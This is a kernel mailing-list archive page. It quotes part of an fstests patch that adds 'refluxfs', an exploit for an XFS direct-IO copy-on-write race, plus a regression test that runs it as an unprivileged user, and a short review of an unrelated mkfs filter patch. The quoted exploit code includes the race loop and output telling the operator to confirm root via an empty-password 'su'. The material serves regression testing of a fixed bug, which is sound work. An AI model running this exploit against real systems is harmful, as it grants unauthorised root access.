> +    while (!atomic_load(&sigint)) {
> +        if ((e = reclone()) < 0) {
> +            fprintf(stderr, "\n");
> +            BAD("reclone: %s", strerror(-e));
> +            rc = 1; break;
> +        }
> +        rounds++;
> +        pthread_barrier_wait(&bar);          /* release writers */
> +        pthread_barrier_wait(&bar);          /* writers done   */
> +        if (target_changed()) { rc = 0; break; }
> +        clock_gettime(CLOCK_MONOTONIC, &t);
> +        long el = t.tv_sec - t0.tv_sec;
> +        if (el >= budget_s) break;
> +        if ((rounds & 0xff) == 0)
> +            fprintf(stderr, "\r    round %ld  (%lds, ~%ld r/s)   ",
> +                    rounds, el, el ? rounds/el : rounds);
> +    }
> +    fprintf(stderr, "\n");
> +
> +    /* Shutdown. Every path out of the loop above leaves each writer either
> +     * already at (or on its way to) the start-barrier -- the loop never breaks
> +     * between the two barrier_wait()s, and writers only test `stop`, which is
> +     * still 0.  Set `stop` now, cross the start-barrier once to release them;
> +     * they observe `stop` immediately after and exit without a second wait. */
> +    atomic_store(&stop, 1);
> +    pthread_barrier_wait(&bar);
> +    for (int i = 0; i < nr_writers;  i++) pthread_join(tw[i], NULL);
> +    for (int i = 0; i < nr_pressure; i++) pthread_join(tp[i], NULL);
> +    free(tw); free(tp);
> +
> +    if (rc == 0) {
> +        keep_backup = 1;       /* atexit(cleanup) leaves backup + workdir */
> +        char now[96] = {0};
> +        if (pread(target_fd_ro, now, sizeof now - 1, 0) > 0)
> +            for (char *q = now; *q; q++) if (*q == '\n') { *q = 0; break; }
> +        BAD("=========================================================");
> +        BAD("VULNERABLE -- %s block 0 overwritten via stale-imap DIO", target_path);
> +        BAD("first line is now:  %s", now);
> +        BAD("hit at round %ld", rounds);
> +        BAD("=========================================================");
> +        fprintf(stderr, "\n");
> +        INFO("Confirm:  su                 (empty password -> `id` shows uid=0)");
> +        INFO("Restore:  # dd if=%s of=%s", backup_path, target_path);
> +        INFO("          (as root; dd is read/write. Do NOT use cp or cat: cp");
> +        INFO("           reflinks via FICLONE by default (>=9.0), and recent");
> +        INFO("           coreutils cat uses copy_file_range() which also");
> +        INFO("           reflinks -- either would leave the target SHARED.)");
> +    } else if (rc == 2) {
> +        OK("race did not fire in %ld rounds.", rounds);
> +        if (!atomic_load(&sigint))
> +            INFO("Kernel is likely PATCHED (or window too tight -- retry with larger -s / -w).");
> +    }
> +    return rc;
> +}
> diff --git a/tests/generic/1956 b/tests/generic/1956
> new file mode 100755
> index 00000000000000..bc926e4685408e
> --- /dev/null
> +++ b/tests/generic/1956
> @@ -0,0 +1,58 @@
> +#! /bin/bash
> +# SPDX-License-Identifier: GPL-2.0
> +# Copyright (c) 2026 Oracle.  All Rights Reserved.
> +#
> +# FS QA Test No. 1956
> +#
> +# Regression test for refluxfs, which is an exploit for a race condition in
> +# XFS' directio copy-on-write code that can be used to rewrite shared blocks
> +# to gain root privileges.
> +#
> +. ./common/preamble
> +_begin_fstest auto rw clone
> +
> +_cleanup()
> +{
> +	cd /
> +	rm -r -f $tmp.*
> +	test -n "$dummydir" && rm -r -f "$dummydir"
> +}
> +
> +. ./common/reflink
> +
> +_require_test_program "refluxfs"
> +_require_test_reflink
> +_require_odirect
> +_require_user fsgqa
> +_require_group fsgqa
> +
> +_fixed_by_fs_commit xfs 2f4acd0fcd862e \
> +	"xfs: resample the data fork mapping after cycling ILOCK"
> +
> +dummydir="$TEST_DIR/$seq"
> +
> +rm -r -f "$dummydir"
> +mkdir "$dummydir"
> +
> +fakedata="root:x:0:0:root:/root:/bin/bash"
> +echo "$fakedata" > $dummydir/datafile
> +
> +# Try to trick the system into letting a different user make a reflink copy of
> +# the data file and rewrite the shared data block to corrupt the contents.
> +mkdir $dummydir/workdir
> +chown $qa_user:$qa_group $dummydir/workdir
> +_su $qa_user -c "$here/src/refluxfs -t $dummydir/datafile -d $dummydir/workdir -s $((30 * TIME_FACTOR))" &>> $seqres.full
> +res=$?
> +case "$res" in
> +0)	echo "vulnerable to corruption";;
> +1)	echo "runtime error";;
> +2)	echo "corruption not observed";;
> +*)	echo "unknown outcome $res";;
> +esac
> +
> +result="$(cat $dummydir/datafile)"
> +test "$result" != "$fakedata" && \
> +	echo "shared data block rewritten, you have been pwned!"
> +
> +# success, all done
> +_exit 0
> diff --git a/tests/generic/1956.out b/tests/generic/1956.out
> new file mode 100644
> index 00000000000000..55d8be979b1486
> --- /dev/null
> +++ b/tests/generic/1956.out
> @@ -0,0 +1,2 @@
> +QA output created by 1956
> +corruption not observed
> 

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output
  2026-09-28 15:36 ` [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output Darrick J. Wong
  2026-10-01 12:27   ` Andrey Albershteyn
  2026-10-05 12:57   ` Christoph Hellwig
@ 2026-10-08 14:47   ` Zorro Lang
  2 siblings, 0 replies; 11+ messages in thread
From: Zorro Lang @ 2026-10-08 14:47 UTC (permalink / raw)
  To: Darrick J. Wong; +Cc: linux-xfs, fstests

On Mon, Sep 28, 2026 at 08:36:27AM -0700, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
> 
> A subsequent patch will want to be able to extract the start of an
> internal rt volume from the xfs_info output, so add the necessary lines
> to _xfs_filter_mkfs to transform the output into bash variables.
> 
> Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
> ---

Makes sense,

Reviewed-by: Zorro Lang <zlang@kernel.org>

>  common/xfs |    3 +++
>  1 file changed, 3 insertions(+)
> 
> 
> diff --git a/common/xfs b/common/xfs
> index 98981e624ddade..318b1a3b245ae6 100644
> --- a/common/xfs
> +++ b/common/xfs
> @@ -1787,6 +1787,9 @@ _xfs_filter_mkfs()
>  	}
>  	if (/^\s+=\s+rgcount=(\d+)\s+rgsize=(\d+) extents/) {
>  		print STDERR "rgcount=$1\nrgextents=$2\n";
> +	}
> +	if (/^\s+=\s+zoned=(\d+)\s+start=(\d+) reserved=(\d+)/) {
> +		print STDERR "zoned=$1\nrtstart=$2\nrtreserved=$3\n";
>  	}'
>  }
>  
> 

^ permalink raw reply	[flat|nested] 11+ messages in thread

end of thread, other threads:[~2026-10-08 14:47 UTC | newest]

Thread overview: 11+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-09-28 15:36 [PATCHSET] fstests: new tests for old features Darrick J. Wong
2026-09-28 15:36 ` [PATCH 1/4] generic: regression test for refluxfs fixes Darrick J. Wong
2026-10-08 14:45   ` Zorro Lang
2026-09-28 15:36 ` [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output Darrick J. Wong
2026-10-01 12:27   ` Andrey Albershteyn
2026-10-05 12:57   ` Christoph Hellwig
2026-10-08 14:47   ` Zorro Lang
2026-09-28 15:36 ` [PATCH 3/4] xfs: basic functional testing of media verification command Darrick J. Wong
2026-10-01 12:44   ` Andrey Albershteyn
2026-10-05 12:57   ` Christoph Hellwig
2026-09-28 15:36 ` [PATCH 4/4] xfs: test mkfs.xfs config file generation Darrick J. Wong

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox